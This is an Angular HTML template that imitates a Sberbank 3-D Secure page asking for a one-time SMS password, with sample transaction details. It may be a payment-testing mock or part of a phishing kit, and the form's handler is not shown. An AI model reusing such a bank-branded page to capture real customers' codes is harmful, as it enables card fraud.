<link href="assets/style.css" rel="STYLESHEET" type="text/css">
<link href="assets/ma_style.css" rel="STYLESHEET" type="text/css">



<div class="modal-page">
  <div class="header">
    <div>
      <img src="assets/sberbank/images/MyBank.png">
    </div>
  </div>

  <form (ngSubmit) = validate(smspass.value) accept-charset="utf-8">
    <h1>Введите Ваш пароль</h1>

    <div class="list" id="descList" style="display: block;">
      <div class="list-item" id="pa_merchant">
        <div class="labelSber">Магазин:</div>
        <div class="value">Tinkoff Bank</div>
      </div>
      <div class="list-item" id="pa_desc">
        <div class="labelSber">Описание:</div>
        <div class="value">На добрые дела</div>
      </div>
      <div class="list-item" id="pa_amount">
        <div class="labelSber">Сумма:</div>
        <div class="value"><b>10.00 RUB</b></div>
      </div>
      <div class="list-item" id="pa_date">
        <div class="labelSber">Дата:</div>
        <div class="value">11/24/2017</div>
      </div>
      <div class="list-item" id="pa_pan">
        <div class="labelSber">Номер карты:</div>
        <div class="value"> **** **** **** 2101</div>
      </div>
      <div class="list-item" id="pamrow">
        <div class="labelSber">Личное приветствие:</div>
        <div class="value">Hello
        </div>
      </div>

      </div>

    <div id="desc" class="desc"><p>Одноразовый пароль был направлен на Ваш номер телефона. Пожалуйста, проверьте реквизиты транзакции и введите пароль из SMS.</p></div>
    <div class="list">

      <input class="big-input" id="psw_id" type="password" placeholder="Одноразовый SMS пароль" name="PASSWORD" size="20" maxlength="20" autocomplete="off" #smspass>
      <p class="desc">
        <input type="hidden" name="PSW_RENEW" value="Y">
        <input type="hidden" name="TRIES" value="Y">
        <a class="small" href="javascript:void(0);" onclick="javascript:resendSMS(); return false;">Не получили одноразовый пароль по SMS?</a>
      </p>

      <div class="footer">
        <div class="row">
          <div>
            <button class="big-button" type="submit" id="btnSubmit" name="btSubmit" >Отправить</button>
          </div>
        </div>
        <br>
        <div class="row">
          <div class="left"><a href="javascript:void(0);" onclick="OnExit(); return false;">Выход</a></div>
          <div class="right"><a href="javascript:void(0);" onclick="ShowPage('pa.help');"><img src="assets/sberbank/images/help.gif" class="help_icon" alt="Help" align="absbottom">Помощь</a></div>
        </div>
      </div>
    </div>

    <input type="hidden" name="formaction" value="pa.submit">
  </form>
</div>

<router-outlet></router-outlet>
